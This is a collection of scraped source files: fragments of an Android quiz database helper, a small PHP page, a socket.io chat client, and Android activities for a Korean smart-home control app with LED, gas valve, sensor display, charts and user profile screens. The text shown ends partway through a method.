Log.d("Tag"," Category Selected is "+selectedCategories);
SQLiteDatabase db = getReadableDatabase();
//String whereClause = "qId LIKE CS% AND qTopic = ?"
Cursor res = db.query(TABLE_QUESTIONS, null, " qTopic = ? and qId LIKE 'CS%' ", new String[] { selectedCategories }, null, null, null);
Log.d("tag","Size of Result Set is "+res.getCount());
return res;
}
public Cursor getAnswersForQuestionId(String qId)
{
SQLiteDatabase db = getReadableDatabase();
Cursor res = db.query(TABLE_ANSWERS , null , "qId = ?", new String[] { qId }, null, null, null);
Log.d("tag","Size of Result Set is "+res.getCount());
return res;
}
public Cursor getProgress()
{
SQLiteDatabase db = getReadableDatabase();
String MY_QUERY = "select sum(tComplete) as totaltests , sum(totalCorrectAnswers) as correctAnswers , sum(totalWrongAnswers)as wrongAnswers ,\n" +
"sum(tPass) as totalPass from " + TABLE_TESTS + " where "+ T_ISVISIBLE +" = 1 AND "+ T_COMPLETE + " = 1 " ;
Cursor res = db.rawQuery(MY_QUERY, null);
Log.d("tag","Size of Result Set is "+res.getCount());
return res;
}
public Cursor getFavouriteQuestions()
{
SQLiteDatabase db = getReadableDatabase();
Cursor res = db.query(TABLE_QUESTIONS, null, " qFavourite == 1 ", null, null, null, null);
Log.d("tag","Size of Result Set is "+res.getCount());
return res;
}
public boolean isTableExists(String tableName) {
SQLiteDatabase db = getReadableDatabase();
Cursor cursor = db.rawQuery("select DISTINCT tbl_name from sqlite_master where tbl_name = '"+tableName+"'", null);
if(cursor!=null) {
if(cursor.getCount()>0) {
cursor.close();
return true;
}
cursor.close();
}
return false;
}
public boolean isTableContainsData(String tableName) {
SQLiteDatabase db = getReadableDatabase();
String count = "SELECT count(*) FROM "+ tableName;
Cursor mcursor = db.rawQuery(count, null);
mcursor.moveToFirst();
int icount = mcursor.getInt(0);
if(icount>0) {
Log.d("Tag"," Number of rows return"+icount);
return true;
}
else {
//populate table
Log.d("tag"," No data exist in tables ");
return false;
}
}
}
| a66fee45dfe5ec13b694e4a28ba753d9de9b8192 | [
"Java",
"INI"
] | 7 | Java | Shoaib3008757/XmlParsingTest | f396151fd77d21040cf6dd7a1b071cd37cbe0752 | c4ee06c8c90a301f0eb42dd0709cd1a627690223 |
refs/heads/master | <repo_name>FailingMoon/class<file_sep>/home.php
<html>
<head>
<link rel="stylesheet" href="css/bootstrap.min.css">
</head>
<body>
<div class="text-center">
<?php echo "This is home";
echo "<br>";?>
<button class="btn btn-danger"><span class="glyphicon glyphicon-user"></span>Yun Che</button>
</div>
</body>
</html> | 86ec9db4668d85b45e12f95a11dadcbc7c32c7f0 | [
"PHP"
] | 1 | PHP | FailingMoon/class | 4676713979221679b19bd7449a348e55eb8bc194 | 9d89c0354ddebd83161b931474295e4ba34f7aaf |
refs/heads/master | <file_sep>var socket = io();
socket.on('connect', function() {
console.log('Conectado al servidor');
});
socket.on('disconnect', function() {
console.log('Conexión con el servidor perdida');
});
function enviarMensaje(usuario, mensaje) {
if (usuario.length <= 0) {
usuario = '<NAME>';
}
if (mensaje.length <= 0) {
mensaje = 'Mensaje Vacio';
}
socket.emit('enviarMensaje', {
usuario: usuario,
mensaje: mensaje
}, function(resp) {
console.log('Servidor', resp);
});
}
socket.on('enviarMensaje', function(mensaje) {
console.log('Servidor', mensaje);
}); | 356f27e46ef735fac4603e81a7c0c93db1195be0 | [
"JavaScript"
] | 1 | JavaScript | alfonzzo7/Node_SocketsFundamentos | 4dafe79dcd191f457b21154995d834a19114b534 | d7a5f4b00297920243f6e580239ef88450b0e1fa |
refs/heads/master | <file_sep>package com.example.gihwan.smart_hm;
import android.app.ProgressDialog;
import android.content.ContentValues;
import android.content.DialogInterface;
import android.graphics.Color;
import android.os.AsyncTask;
import android.os.Bundle;
import android.support.annotation.Nullable;
import android.support.v4.widget.SwipeRefreshLayout;
import android.support.v7.app.AlertDialog;
import android.support.v7.app.AppCompatActivity;
import android.util.Log;
import android.view.Gravity;
import android.view.KeyEvent;
import android.view.View;
import android.widget.TextView;
import android.widget.ToggleButton;
import org.json.JSONArray;
import org.json.JSONObject;
import java.io.BufferedReader;
import java.io.IOException;
import java.io.InputStream;
import java.io.InputStreamReader;
import java.io.OutputStream;
import java.net.HttpURLConnection;
import java.net.URL;
/**
* Created by GiHwan on 2017. 12. 27..
*/
public class ControlActivity extends AppCompatActivity {
TextView TMP , Humidity;
TextView State_Gas , State_Fire;
ToggleButton tb_living , tb_kitchen,tb_room,tb_gasvalve;
String LED_State1=""; // 받아온 센서 값을 저장하기 위함
String LED_State2="";
String LED_State3="";
String VALVE_State="";
String TMP_val =""; // 받아온 온도 , 습도 값을 저장하기 위함
String Hum_val ="";
String Gas_val = ""; // 받아온 가스 , 화재 , 문값을 저장하기 위함
String Fire_val = "";
String Door_val = "";
private SwipeRefreshLayout refreshLayout_Control;
@Override
protected void onCreate(@Nullable Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
setContentView(R.layout.activity_control);
TMP = (TextView)findViewById(R.id.Tmp_r1); // 온도 상태를 숫자로 나타내기 위한 Textview
Humidity = (TextView)findViewById(R.id.Tmp_r2); // 습도 상태를 숫자로 나타내기 위한 Textview
State_Gas = (TextView)findViewById(R.id.txt_gas_state); // 가스 상태를 나타내는 Textview
State_Fire = (TextView)findViewById(R.id.txt_fire_state); // 화재 상태를 나타내는 Textview
tb_living = (ToggleButton) findViewById(R.id.switch_L_1); // 토글 버튼 - 거실
tb_kitchen = (ToggleButton) findViewById(R.id.switch_L_2); // - 부엌
tb_room = (ToggleButton) findViewById(R.id.switch_L_3); // - 방
tb_gasvalve = (ToggleButton) findViewById(R.id.switch_G_1); // - 가스벨브
// SwipeRefreshLayout을 사용하여 새로고침을 실행한다.
refreshLayout_Control = (SwipeRefreshLayout)findViewById(R.id.swipeRefreshLo);
refreshLayout_Control.setOnRefreshListener(new SwipeRefreshLayout.OnRefreshListener() {
@Override
public void onRefresh() {
new Control_recv_LED().execute();
refreshLayout_Control.setRefreshing(false);
}
});
new Control_recv_LED().execute();
}
public void State_ToggleBtn_click(View v){
switch (v.getId()){
case R.id.switch_L_1: // LED 토글버튼 클릭시
if(tb_living.isChecked()){
new Control_send().execute("1",LED_State2,LED_State3,VALVE_State);
LED_State1="1";
}
else{
new Control_send().execute("0",LED_State2,LED_State3,VALVE_State);
LED_State1="0";
}
break;
case R.id.switch_L_2: // LED 토글버튼 클릭시
if(tb_kitchen.isChecked()){
new Control_send().execute(LED_State1,"1",LED_State3,VALVE_State);
LED_State2="1";
}
else{
new Control_send().execute(LED_State1,"0",LED_State3,VALVE_State);
LED_State2="0";
}
break;
case R.id.switch_L_3: // LED 토글버튼 클릭시
if(tb_room.isChecked()){
new Control_send().execute(LED_State1,LED_State2,"1",VALVE_State);
LED_State3="1";
}
else{
new Control_send().execute(LED_State1,LED_State2,"0",VALVE_State);
LED_State3="0";
}
break;
case R.id.switch_G_1: // 가스 토글 버튼 클릭시
if(tb_gasvalve.isChecked()){
new Control_send().execute(LED_State1,LED_State2,LED_State3,"1");
VALVE_State="1";
}
else{
new Control_send().execute(LED_State1,LED_State2,LED_State3,"0");
VALVE_State="0";
}
break;
} }
@Override
public boolean onKeyDown(int keyCode, KeyEvent event) {
// 뒤로 가기 버튼 클릭 시 종료 여부를 물어보기 위하여 생성하였다
switch (keyCode) {
case android.view.KeyEvent.KEYCODE_BACK:
new AlertDialog.Builder(this)
.setTitle("알림")
.setMessage("종료하시겠습니까?")
.setPositiveButton("YES", new DialogInterface.OnClickListener() {
@Override
public void onClick(DialogInterface dialog, int which) {
finish();
}
})
.setNegativeButton("NO", null)
.show();
break;
default:
break;
}
return super.onKeyDown(keyCode, event);
}
// LED • 가스 • 화재 • 온도 • 습도 센서의 값을 읽어올 때 처리
public class Control_recv_LED extends AsyncTask<String, Void,String>{
private ProgressDialog progressDialog = new ProgressDialog(ControlActivity.this);
@Override
protected void onPreExecute() {
super.onPreExecute();
// 프로그래스바를 이용
progressDialog.setProgressStyle(ProgressDialog.STYLE_SPINNER);
progressDialog.setMessage("잠시만 기다려 주세요.");
progressDialog.show();
}
@Override
protected void onPostExecute(String res) {
super.onPostExecute(res);
Log.e("모든 LED, 온도, 습도, 가스, 화재 정보를 얻어 온다!", res);
progressDialog.dismiss();
}
@Override
protected String doInBackground(String... sensors) {
try {
for (int i = 0; i < 3; i++) {
progressDialog.setProgress(i * 30);
Thread.sleep(500);
}
} catch (InterruptedException e) {
e.printStackTrace();
}
return getJsonText_LED();
}
}
public String getJsonText_LED() {
StringBuffer sb = new StringBuffer();
try {
String jsonPage = getStringFromUrl("http://52.78.22.237/sensor.php"); // 전등 조작 버튼
String jsonPage_hut = getStringFromUrl("http://52.78.22.237/hutemp.php"); // 온도 습도 조작
String jsonPage_push = getStringFromUrl("http://52.78.22.237/push.php"); // 가스 , 화재 , 문을 알려주기 위한 것 (푸쉬알림)
// 읽어들인 JSON포맷의 데이터를 JSON객체로 변환
JSONObject json_sensor = new JSONObject(jsonPage);
Log.e("json_sensor : ", json_sensor.toString());
JSONObject json_hut = new JSONObject(jsonPage_hut);
Log.e("json_hut : ", json_hut.toString());
JSONObject json_push = new JSONObject(jsonPage_push);
Log.e("json_push : ", json_push.toString());
// 배열로 구성 되어있는 JSON 배열생성
JSONArray jArr_sensor = json_sensor.getJSONArray("sensorData"); // json tag get sensor
JSONArray jArr_hut = json_hut.getJSONArray("hutemp"); // json tag get hutemp
JSONArray jArr_push = json_push.getJSONArray("pushData"); // json tag get pushData
Log.e("JArray_Sensor : ", jArr_sensor.toString());
Log.e("JArray_Hut : ", jArr_hut.toString());
Log.e("jArr_push : ", jArr_push.toString());
if(jArr_sensor.length()!=0){
//배열의 크기만큼 반복하면서, 현재 켜있는 LED의 값을 추출함
for (int i = 0; i < jArr_sensor.length(); i++) {
//i번째 배열 할당
json_sensor = jArr_sensor.getJSONObject(i);
//ksNo,korName의 값을 추출함
LED_State1 = json_sensor.getString("LED1"); // tag 이름 안에 있는 데이터 LED1의 value를 가져온다
LED_State2 = json_sensor.getString("LED2"); // tag 이름 안에 있는 데이터 LED2의 value를 가져온다
LED_State3 = json_sensor.getString("LED3"); // tag 이름 안에 있는 데이터 LED3의 value를 가져온다
VALVE_State = json_sensor.getString("VALVE"); // tag 이름 안에 있는 데이터 VALVE의 value를 가져온다
Log.e("LED 1: " ,LED_State1);
Log.e("LED 2: " ,LED_State2);
Log.e("LED 3: " ,LED_State3);
Log.e("LED 4: " ,VALVE_State);
runOnUiThread(new Runnable() {
@Override
public void run() {
if(LED_State1.equals("1")){
tb_living.setChecked(true);
}
if(LED_State2.equals("1")){
tb_kitchen.setChecked(true);
}
if(LED_State3.equals("1")){
tb_room.setChecked(true);
}
if(VALVE_State.equals("1")){
tb_gasvalve.setChecked(true);
}
if(LED_State1.equals("0")){
tb_living.setChecked(false);
}
if(LED_State2.equals("0")){
tb_kitchen.setChecked(false);
}
if(LED_State3.equals("0")){
tb_room.setChecked(false);
}
if(VALVE_State.equals("0")){
tb_gasvalve.setChecked(false);
}
}});
sb.append("[ " + LED_State1 + " ]\n");
sb.append("[" + LED_State2 + "]\n");
sb.append("[" + LED_State3 + "]\n");
sb.append("[" + VALVE_State + "]\n");
sb.append("\n");
}
}
if(jArr_hut.length() !=0){ // 온도, 습도의 데이터가 있는지 없는지 확인 한다
//배열의 크기만큼 반복하면서, 현재 켜있는 온도의 값을 추출함
for (int i = 0; i < jArr_hut.length(); i++) {
//i번째 배열 할당
json_hut = jArr_hut.getJSONObject(i);
//Temp,Humidity의 값을 추출함
TMP_val = json_hut.getString("temp");
Hum_val = json_hut.getString("hu");
Log.e("temp: " ,TMP_val);
Log.e("hu: " ,Hum_val);
runOnUiThread(new Runnable() {
@Override
public void run() {
TMP.setText(TMP_val+" 도");
TMP.setGravity(Gravity.CENTER);
Humidity.setText(Hum_val+" 도");
Humidity.setGravity(Gravity.CENTER);
}});
sb.append("[" + TMP_val + "]\n");
sb.append("[" + Hum_val + "]\n");
sb.append("\n");
}
}
if(jArr_push.length() !=0){ // 가스 , 화재 , 문 데이터가 있는지 없는지 확인 한다
//배열의 크기만큼 반복하면서, 현재의 가스 , 화재 , 문의 데이터를 추출하기 위함
for (int i = 0; i < jArr_push.length(); i++) {
//i번째 배열 할당
json_push = jArr_push.getJSONObject(i);
//Temp,Humidity의 값을 추출함
Gas_val = json_push.getString("GAS");
Fire_val = json_push.getString("FIRE");
Door_val = json_push.getString("DOOR");
Log.e("gas: " ,Gas_val);
Log.e("fire: " ,Fire_val);
Log.e("door: " ,Door_val);
runOnUiThread(new Runnable() {
@Override
public void run() {
if(Gas_val.equals("1")){
State_Gas.setText("가스가 누출 되었습니다.");
State_Gas.setTextColor(Color.RED);
}
if(Fire_val.equals("1")){
State_Fire.setText("화재 위험이 감지되었습니다.");
State_Fire.setTextColor(Color.RED);
}
if(Gas_val.equals("0")){
State_Gas.setText("현재 가스는 안전합니다.");
State_Gas.setTextColor(Color.parseColor("#388E3C"));
}
if(Fire_val.equals("0")){
State_Fire.setText("현재 화재는 안전합니다.");
State_Fire.setTextColor(Color.parseColor("#388E3C"));
}
}});
sb.append("[" + Gas_val + "]\n");
sb.append("[" + Fire_val + "]\n");
sb.append("[" + Door_val + "]\n");
sb.append("\n");
}
}
} catch (Exception e){
e.printStackTrace();
}
return sb.toString();
}
public String getStringFromUrl(String pUrl) {
BufferedReader bufreader = null;
HttpURLConnection urlConnection = null;
StringBuffer page = new StringBuffer(); //읽어온 데이터를 저장할 StringBuffer객체 생성
try {
URL url = new URL(pUrl);
urlConnection = (HttpURLConnection) url.openConnection();
InputStream contentStream = urlConnection.getInputStream();
bufreader = new BufferedReader(new InputStreamReader(contentStream, "UTF-8"));
String line = null;
//버퍼의 웹문서 소스를 줄단위로 읽어(line), Page에 저장함
while ((line = bufreader.readLine()) != null) {
Log.d("my_data:", line);
page.append(line);
}
} catch (IOException e) {
e.printStackTrace();
} finally {
//자원해제
try {
bufreader.close();
urlConnection.disconnect();
} catch (IOException e) {
e.printStackTrace();
}
}
return page.toString();
} // getStringFromUrl : 주어진 URL의 문서의 내용을 문자열로 반환
// LED 버튼을 제어 할 값을 보낼 때 처리
public class Control_send extends AsyncTask<String, Void,String>{
private ProgressDialog progressDialog = new ProgressDialog(ControlActivity.this);
@Override
protected void onPreExecute() {
super.onPreExecute();
progressDialog.setProgressStyle(ProgressDialog.STYLE_SPINNER);
progressDialog.setMessage("잠시만 기다려 주세요.");
progressDialog.show();
}
@Override
protected void onPostExecute(String res) {
super.onPostExecute(res);
Log.e("내가 버튼 제어할 정보를 보여준다", res);
progressDialog.dismiss();
}
@Override
protected String doInBackground(String... params) {
try {
for (int i = 0; i < 3; i++) {
progressDialog.setProgress(i * 30);
Thread.sleep(500);
}
} catch (InterruptedException e) {
e.printStackTrace();
}
String LED1 = params[0];
String LED2 = params[1];
String LED3 = params[2];
String VALVE = params[3];
Log.e("내가 전송하는 값 : " , LED1+LED2+LED3+VALVE);
String server_URL = "http://172.16.58.3/sensor.php";
String postParameters = "LED1="+LED1 + "&LED2="+LED2+"&LED3="+LED3+"&VALVE="+VALVE;
try {
URL url = new URL(server_URL+"?"+postParameters);
HttpURLConnection httpURLConnection = (HttpURLConnection) url.openConnection();
httpURLConnection.setReadTimeout(5000);
httpURLConnection.setConnectTimeout(5000);
httpURLConnection.setRequestMethod("POST");
httpURLConnection.setDoInput(true);
httpURLConnection.connect();
OutputStream outputStream = httpURLConnection.getOutputStream();
outputStream.write(postParameters.getBytes("UTF-8"));
outputStream.flush();
outputStream.close();
int responseStatusCode = httpURLConnection.getResponseCode();
Log.d(ContentValues.TAG, "POST response code - " + responseStatusCode);
InputStream inputStream;
if (responseStatusCode == HttpURLConnection.HTTP_OK) {
inputStream = httpURLConnection.getInputStream();
} else {
inputStream = httpURLConnection.getErrorStream();
}
/* 서버 -> 안드로이드 파라메터값 전달 */
InputStreamReader inputStreamReader = new InputStreamReader(inputStream, "UTF-8");
BufferedReader bufferedReader = new BufferedReader(inputStreamReader);
StringBuilder sb = new StringBuilder();
String line = null;
while ((line = bufferedReader.readLine()) != null) {
sb.append(line);
}
bufferedReader.close();
return sb.toString();
} catch (Exception e) {
Log.d(ContentValues.TAG, "RecvData: Error ", e);
return new String("Error: " + e.getMessage());
}
}
}
}<file_sep>package com.example.gihwan.smart_hm;
import android.app.Dialog;
import android.content.Context;
import android.support.annotation.NonNull;
import android.view.Window;
/**
* Created by GiHwan on 2018. 1. 8..
*/
public class CustomProgressDialog extends Dialog{
public CustomProgressDialog(@NonNull Context context) {
super(context);
requestWindowFeature(Window.FEATURE_NO_TITLE); // 지저분한(?) 다이얼 로그 제목을 날림
setContentView(R.layout.custom_dialog); // 다이얼로그에 박을 레이아웃
}
}
<file_sep>package com.example.gihwan.smart_hm;
import android.app.Activity;
import android.content.DialogInterface;
import android.graphics.Color;
import android.os.Bundle;
import android.support.v4.widget.SwipeRefreshLayout;
import android.support.v7.app.AlertDialog;
import android.view.KeyEvent;
import android.view.View;
import com.github.mikephil.charting.animation.Easing;
import com.github.mikephil.charting.charts.BarChart;
import com.github.mikephil.charting.charts.PieChart;
import com.github.mikephil.charting.data.BarData;
import com.github.mikephil.charting.data.BarDataSet;
import com.github.mikephil.charting.data.BarEntry;
import com.github.mikephil.charting.data.Entry;
import com.github.mikephil.charting.data.PieData;
import com.github.mikephil.charting.data.PieDataSet;
import com.github.mikephil.charting.formatter.PercentFormatter;
import com.github.mikephil.charting.highlight.Highlight;
import com.github.mikephil.charting.interfaces.datasets.IBarDataSet;
import com.github.mikephil.charting.listener.OnChartValueSelectedListener;
import com.github.mikephil.charting.utils.ColorTemplate;
import java.util.ArrayList;
/**
* Created by GiHwan on 2017. 12. 27..
*/
public class ChartActivity extends Activity {
PieChart pieChart_LED;
BarChart BarData_Feel;
private SwipeRefreshLayout refreshLayout_Chart;
@Override
protected void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
setContentView(R.layout.activity_chart);
pieChart_LED = (PieChart) findViewById(R.id.piechart_LED); // LED 사용량 계산
BarData_Feel = (BarChart) findViewById(R.id.barchart_feel); // 온도 사용량 계산
refreshLayout_Chart = (SwipeRefreshLayout) findViewById(R.id.swipeRefreshChart);
refreshLayout_Chart.setOnRefreshListener(new SwipeRefreshLayout.OnRefreshListener() {
@Override
public void onRefresh() {
refreshLayout_Chart.setRefreshing(false);
pieChart_LED.setVisibility(View.INVISIBLE);
BarData_Feel.setVisibility(View.INVISIBLE);
}
});
}
private void setupPieChart_LED() {
pieChart_LED.setUsePercentValues(true);
pieChart_LED.setExtraOffsets(5, 10, 5, 5);
pieChart_LED.setDragDecelerationFrictionCoef(0.95f);
pieChart_LED.setDrawHoleEnabled(false);
pieChart_LED.setHoleColor(Color.WHITE);
pieChart_LED.setTransparentCircleRadius(61f);
ArrayList<Entry> yValues = new ArrayList<Entry>();
yValues.add(new Entry(34f, 0));
yValues.add(new Entry(23f, 1));
yValues.add(new Entry(14f, 2));
yValues.add(new Entry(35f, 3));
PieDataSet dataSet_LED = new PieDataSet(yValues, "");
dataSet_LED.setValueTextSize(15);
dataSet_LED.setSliceSpace(3f);
dataSet_LED.setSelectionShift(5f);
dataSet_LED.setColors(ColorTemplate.COLORFUL_COLORS);
final ArrayList<String> xVals = new ArrayList<String>();
xVals.add("거실");
xVals.add("부엌");
xVals.add("방");
xVals.add("가스벨브");
pieChart_LED.animateY(1000, Easing.EasingOption.EaseInOutExpo); //애니메이션
PieData data = new PieData(xVals, dataSet_LED);
data.setValueFormatter(new PercentFormatter());
data.setValueTextColor(Color.WHITE);
pieChart_LED.setData(data);
pieChart_LED.setDescription("가스 • 전기 사용량");
pieChart_LED.setDescriptionTextSize(18f);
pieChart_LED.setOnChartValueSelectedListener(new OnChartValueSelectedListener() {
@Override
public void onValueSelected(Entry e, int dataSetIndex, Highlight h) {
switch (dataSetIndex) {
case 0:
com.nispok.snackbar.Snackbar.with(getApplicationContext())
.text("총 거실의 전기 사용량은 : " + e.getVal() + " 입니다.")
.show(ChartActivity.this);
break;
case 1:
com.nispok.snackbar.Snackbar.with(getApplicationContext())
.text("총 부엌의 전기 사용량은 : " + e.getVal() + " 입니다.")
.show(ChartActivity.this);
break;
case 2:
com.nispok.snackbar.Snackbar.with(getApplicationContext())
.text("총 방의 전기 사용량은 : " + e.getVal() + " 입니다.")
.show(ChartActivity.this);
break;
case 3:
com.nispok.snackbar.Snackbar.with(getApplicationContext())
.text("총 가스벨브의 사용량은 : " + e.getVal() + " 입니다.")
.show(ChartActivity.this);
break;
}
}
@Override
public void onNothingSelected() {
}
});
pieChart_LED.setData(data);
pieChart_LED.invalidate();
}
private void setupBarChart_Val() {
ArrayList<String> month = new ArrayList<String>();
month.add("1월");
month.add("2월");
month.add("3월");
month.add("4월");
month.add("5월");
//month.add("6월");
ArrayList<BarEntry> bar_Tmp = new ArrayList<>();
bar_Tmp.add(new BarEntry(8, 0));
bar_Tmp.add(new BarEntry(2, 1));
bar_Tmp.add(new BarEntry(15, 2));
bar_Tmp.add(new BarEntry(20, 3));
//bar_Tmp.add(new BarEntry(5, 4));
ArrayList<BarEntry> bar_Hmi = new ArrayList<>();
bar_Hmi.add(new BarEntry(16, 0));
bar_Hmi.add(new BarEntry(14, 1));
bar_Hmi.add(new BarEntry(5, 2));
bar_Hmi.add(new BarEntry(20, 3));
//bar_Tmp.add(new BarEntry(5, 4));
BarDataSet TMP_set = new BarDataSet(bar_Tmp, "온도");
TMP_set.setColor(Color.rgb(244, 67, 54));
TMP_set.setDrawValues(true);
BarDataSet Humidity_set = new BarDataSet(bar_Hmi, "습도");
Humidity_set.setColor(Color.rgb(255, 235, 59));
Humidity_set.setDrawValues(true);
ArrayList<IBarDataSet> dataSets_bar = new ArrayList<>();
dataSets_bar.add(TMP_set);
dataSets_bar.add(Humidity_set);
BarData feel_data = new BarData(month, dataSets_bar);
BarData_Feel.setData(feel_data); // initialize the Bardata with argument labels and dataSet
BarData_Feel.animateY(2000);
BarData_Feel.setDescription("온도,습도 사용량");
BarData_Feel.setDescriptionTextSize(10f);
// BarData_Feel.getLegend().setEnabled(false);
BarData_Feel.invalidate();
}
public void Chart_Btn_Click(View v) {
switch (v.getId()) {
case R.id.LED_chart:
setupPieChart_LED();
pieChart_LED.setVisibility(View.VISIBLE);
BarData_Feel.setVisibility(View.INVISIBLE);
break;
case R.id.grpah_show:
setupBarChart_Val();
BarData_Feel.setVisibility(View.VISIBLE);
pieChart_LED.setVisibility(View.INVISIBLE);
break;
}
}
@Override
public boolean onKeyDown(int keyCode, KeyEvent event) { // 뒤로 가기 버튼 클릭 시 종료 여부를 물어보기 위함
switch (keyCode) {
case android.view.KeyEvent.KEYCODE_BACK:
new AlertDialog.Builder(this)
.setTitle("알림")
.setMessage("종료하시겠습니까?")
.setPositiveButton("YES", new DialogInterface.OnClickListener() {
@Override
public void onClick(DialogInterface dialog, int which) {
finish();
}
})
.setNegativeButton("NO", null)
.show();
break;
default:
break;
}
return super.onKeyDown(keyCode, event);
}
}<file_sep>package com.example.gihwan.smart_hm;
import android.app.Activity;
import android.app.ProgressDialog;
import android.content.ContentValues;
import android.content.DialogInterface;
import android.content.Intent;
import android.os.AsyncTask;
import android.os.Bundle;
import android.support.annotation.Nullable;
import android.support.v7.app.AlertDialog;
import android.text.InputFilter;
import android.text.Spanned;
import android.text.method.ScrollingMovementMethod;
import android.util.Log;
import android.view.KeyEvent;
import android.view.View;
import android.widget.EditText;
import android.widget.TextView;
import com.google.gson.Gson;
import com.kakao.kakaolink.KakaoLink;
import com.kakao.kakaolink.KakaoTalkLinkMessageBuilder;
import com.kakao.util.KakaoParameterException;
import org.json.JSONArray;
import org.json.JSONObject;
import java.io.BufferedReader;
import java.io.InputStream;
import java.io.InputStreamReader;
import java.io.OutputStream;
import java.net.HttpURLConnection;
import java.net.URL;
import java.util.regex.Pattern;
import static android.content.ContentValues.TAG;
/**
* Created by GiHwan on 2017. 12. 27..
*/
public class MypageActivity extends Activity {
private KakaoLink kakaoLink; // 카카오톡 메신저를 사용하기 위해 선언해놓은 변수
EditText Mypage_PN;
TextView Mypage_ID,Mypage_CODE; // 입력한 코드 번호를 공유하기 위해 선언해놓은 변수
EditText Mypage_PW1, Mypage_PW2, Mypage_NAME;
TextView Mypage_ADDR_Show;
private String str = ""; // 주소 값을 전달 받아 수정하기 위함
private String usr_id = ""; // 사용자의 값을 전달 하기 위함
private String usr_code = "";
String usr_id_recv = ""; // 인텐트로 값을 전달 받기 위함
String usr_code_recv = "";
private String usr_id_json = ""; //json으로 받은 값을 사용하기 위함
private String usr_pw_json = "";
private String usr_pw_r_json = "";
private String usr_name_json = "";
private String usr_addr_json = "";
private String usr_phone_json = "";
private String usr_code_json = "";
@Override
protected void onCreate(@Nullable Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
setContentView(R.layout.activity_mypage);
Mypage_ID = (TextView) findViewById(R.id.Mypage_Id);
Mypage_PW1 = (EditText) findViewById(R.id.Mypage_Pw1);
Mypage_PW2 = (EditText) findViewById(R.id.Mypage_Pw2);
Mypage_NAME = (EditText) findViewById(R.id.Mypage_Name);
Mypage_ADDR_Show = (TextView) findViewById(R.id.Mypage_Addr_Show);
Mypage_PN = (EditText) findViewById(R.id.Mypage_Pn);
Mypage_CODE = (TextView) findViewById(R.id.Mypage_Code);
try {
Intent intent_I = getIntent();
usr_id_recv = intent_I.getStringExtra("usr_id_recv");
usr_code_recv = intent_I.getStringExtra("usr_code_recv");
Log.e("usr_id_recv_Mypage", usr_id_recv);
Log.e("usr_code_recv_Mypage", usr_code_recv);
kakaoLink = KakaoLink.getKakaoLink(MypageActivity.this);
Mypage_PW1.setFilters(new InputFilter[] {filter_mypage}); // 입력할 때 데이터 베이스에 효율적으로 접근하기 위해 영어만 입력하도록 함
Mypage_PW2.setFilters(new InputFilter[] {filter_mypage}); // 입력할 때 데이터 베이스에 효율적으로 접근하기 위해 영어만 입력하도록 함
// 만들어놓은 Select_Login를 선언 및 실행
// 인텐트를 통해 전달 받은 값을 execute해야 함
new MypageActivity.Json_select().execute(usr_id_recv, usr_code_recv);
} catch (KakaoParameterException e) {
e.printStackTrace();
}
// TextView Scrolling 가능하게 하기
Mypage_ADDR_Show.setMovementMethod(new ScrollingMovementMethod().getInstance());
}
// 영어만 입력하기 위한 필터 처리 해주는 코드
protected InputFilter filter_mypage= new InputFilter() {
public CharSequence filter(CharSequence source, int start, int end, Spanned dest, int dstart, int dend) {
Pattern ps = Pattern.compile("^[a-zA-Z0-9]+$");
if (!ps.matcher(source).matches()) {
return "";
}
return null;
}
};
public void Mypage_Btn_click(View v) {
switch (v.getId()) {
case R.id.Mypage_Btn: // 카카오 버튼을 통해 코드번호를 보내기 위함
final KakaoTalkLinkMessageBuilder kakaoTalkLinkMessageBuilder
= kakaoLink.createKakaoTalkLinkMessageBuilder();
try {
kakaoTalkLinkMessageBuilder.addText("안녕하세요~ \n\""+Mypage_NAME.getText().toString()+"\" 님의 가족분이 사용할 코드는 \n => "
+ Mypage_CODE.getText().toString()+" 입니다.\n 확인 후 로그인 해주세요");
kakaoLink.sendMessage(kakaoTalkLinkMessageBuilder, this); // 메시지 전송
} catch (KakaoParameterException e) {
e.printStackTrace();
}
finish();
break;
case R.id.Mypage_Cancel: // 취소 버튼 클릭시
startActivity(new Intent(this, MainActivity.class));
finish();
break;
case R.id.Mypage_Delete: // 회원 탈퇴 버튼 클릭 시 한번 더 물어보자
new AlertDialog.Builder(this)
.setTitle("중요알림")
.setMessage("정말 탈퇴 하시겠습니까?")
.setPositiveButton("네", new DialogInterface.OnClickListener() {
@Override
public void onClick(DialogInterface dialog, int which) {
new Json_Delete().execute(usr_code_json);
startActivity(new Intent(getApplicationContext(), MainActivity.class));
finish();
}
})
.setNegativeButton("아니요", null)
.show();
break;
case R.id.Mypage_Update: // 회원 정보 변경 버튼 클릭시
usr_id_json = Mypage_ID.getText().toString();
usr_pw_json = Mypage_PW1.getText().toString();
usr_pw_r_json = Mypage_PW2.getText().toString();
usr_name_json = Mypage_NAME.getText().toString();
usr_phone_json = Mypage_PN.getText().toString();
usr_code_json =Mypage_CODE.getText().toString();
new Json_Update().execute(usr_id_json,usr_pw_json,usr_pw_r_json,usr_name_json,usr_addr_json,usr_phone_json,usr_code_json);
break;
case R.id.Mypage_Addr_Btn: // 회원 주소 변경 버튼 클릭시
Intent in_getData = new Intent(MypageActivity.this, AdselectActivity.class);
startActivityForResult(in_getData, 0);
break;
}
}
public class Json_Delete extends AsyncTask<String,Void,String> {
private ProgressDialog Back_dialog = new ProgressDialog(MypageActivity.this);
@Override
protected void onPreExecute() {
super.onPreExecute();
Back_dialog.setProgressStyle(ProgressDialog.STYLE_SPINNER);
Back_dialog.setMessage("잠시만 기다려 주세요.");
Back_dialog.show();
}
@Override
protected void onPostExecute(String res) {
super.onPostExecute(res);
Back_dialog.dismiss();
Log.e("Delete_Post Value : ", res);
com.nispok.snackbar.Snackbar.with(getApplicationContext())
.text(res)
.show(MypageActivity.this);
Mypage_ID.setText("");
Mypage_PW1.setText("");
Mypage_PW2.setText("");
Mypage_NAME.setText("");
Mypage_ADDR_Show.setText("");
Mypage_PN.setText("");
Mypage_CODE.setText("");
}
@Override
protected String doInBackground(String... params) {
String usr_code = (String) params[0];
String server_URL = "http://192.168.127.12/hdelete.php";
String postParameters = "usr_code=" + usr_code;
Log.e("Delete_postParameters : ", postParameters);
try {
URL url = new URL(server_URL);
HttpURLConnection httpURLConnection = (HttpURLConnection) url.openConnection();
httpURLConnection.setReadTimeout(5000);
httpURLConnection.setConnectTimeout(5000);
httpURLConnection.setRequestMethod("POST");
httpURLConnection.setDoInput(true);
httpURLConnection.connect();
